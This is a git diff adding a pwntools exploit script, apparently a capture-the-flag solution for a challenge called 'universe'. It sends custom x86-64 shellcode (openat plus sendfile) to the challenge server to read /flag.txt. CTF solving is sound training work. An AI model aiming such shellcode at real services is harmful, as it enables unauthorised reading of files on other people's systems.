diff --git a/africabattlectf_2024/universe/a.py b/africabattlectf_2024/universe/a.py
new file mode 100644
index 0000000..7d9676c
--- /dev/null
+++ b/africabattlectf_2024/universe/a.py
@@ -0,0 +1,28 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./universe", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1004)
+
+# openat + sendfile
+shellcode="""
+lea rsi, [rdx+35]
+mov edi, -100
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+mov rsi, rax
+mov al, 40
+shr edi, 255
+add r10b, 255
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"/flag.txt\0"
+shellcode += b"\x90"*(4096-len(shellcode))
+r.sendline(shellcode)
+
+r.interactive()
\ No newline at end of file